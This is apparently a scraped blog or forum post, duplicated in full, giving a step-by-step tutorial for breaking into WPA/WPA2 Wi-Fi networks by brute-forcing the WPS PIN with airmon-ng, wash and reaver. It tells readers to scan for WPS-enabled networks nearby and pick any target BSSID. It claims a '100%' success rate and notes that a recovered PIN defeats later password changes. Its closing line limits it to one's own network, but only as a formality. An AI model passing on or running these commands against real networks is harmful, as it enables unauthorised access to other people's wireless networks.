There are probably many of you that already know this, and many that don't so i thought i'd just make a post on how to do this.
I've tried cracking WPA2 with dictionary attack many many times and it fails ALOT and bruteforce takes way to long time.
New routers got a function called WPS or WiFi Protected Setup, these routers are also usually 802.11n routers which usually also got better speed than old ones.
WPS is a setup that attempts to allow easy establishment of a secure wireless home network.
It will ONLY work against WPA/WPA2 networks with WPS enabled and it has a success rate at 100%. It can take from 30 minutes up to 10 hrs depends how far you are from the access point.
First off you will need to locate which networks has WPS enabled in your area (usually many)
Im assuming that you're on backtrack, so lets begin
Tools used
1) Locate your interface in ifconfig
2) airmon-ng start yourinterface (usually wlan0)
3) So how do we know if a router has WPS enabled? Type : wash -i mon0 to see the list of WPS enabled routers.
4) Copy the BSSID of the a network of your choice. Then close wash as we only use it to get the BSSID.
5) To use reaver, just type in terminal: reaver -h. Read through the switches.
6) To begin attack on the target BSSID, type : reaver -b (BSSID) -vv
7) As shown in the example below, reaver first waits for a beacon from the target bssid.
8) Reaver then changes the monitor interface (mon0) to the target channel.
9) Reaver successfully associates with the target BSSID. And the brute forcing on the enabled WPS begins!
10) The reaver terminal will reveal the various pin format that were used to brute force against the WPS.
11) This could take anywhere from 30mins to 10hrs to complete. But it will succeed.
12) If your brute is successful, the end result will be as shown below.
If you should cancel the process in the middle of the process you can just start it again and it will ask to resume at the place you stopped.
Also if the owner changes the password you can enter the pin that was found in reaver and it will crack the new password in the matter of seconds.
I have found this very useful, and for those who didnt know this already might find good use for it.
This is only meant for penetration testing your own network ofcourse, i do not encourage hacking
.
Adios!
I've tried cracking WPA2 with dictionary attack many many times and it fails ALOT and bruteforce takes way to long time.
New routers got a function called WPS or WiFi Protected Setup, these routers are also usually 802.11n routers which usually also got better speed than old ones.
WPS is a setup that attempts to allow easy establishment of a secure wireless home network.
It will ONLY work against WPA/WPA2 networks with WPS enabled and it has a success rate at 100%. It can take from 30 minutes up to 10 hrs depends how far you are from the access point.
First off you will need to locate which networks has WPS enabled in your area (usually many)
Im assuming that you're on backtrack, so lets begin
Tools used
- Aircrack
- Reaver
1) Locate your interface in ifconfig
2) airmon-ng start yourinterface (usually wlan0)
3) So how do we know if a router has WPS enabled? Type : wash -i mon0 to see the list of WPS enabled routers.
4) Copy the BSSID of the a network of your choice. Then close wash as we only use it to get the BSSID.
5) To use reaver, just type in terminal: reaver -h. Read through the switches.
6) To begin attack on the target BSSID, type : reaver -b (BSSID) -vv
7) As shown in the example below, reaver first waits for a beacon from the target bssid.
8) Reaver then changes the monitor interface (mon0) to the target channel.
9) Reaver successfully associates with the target BSSID. And the brute forcing on the enabled WPS begins!
10) The reaver terminal will reveal the various pin format that were used to brute force against the WPS.
11) This could take anywhere from 30mins to 10hrs to complete. But it will succeed.
12) If your brute is successful, the end result will be as shown below.
If you should cancel the process in the middle of the process you can just start it again and it will ask to resume at the place you stopped.
Also if the owner changes the password you can enter the pin that was found in reaver and it will crack the new password in the matter of seconds.
I have found this very useful, and for those who didnt know this already might find good use for it.
This is only meant for penetration testing your own network ofcourse, i do not encourage hacking
.Adios!
0 comentários:
Postar um comentário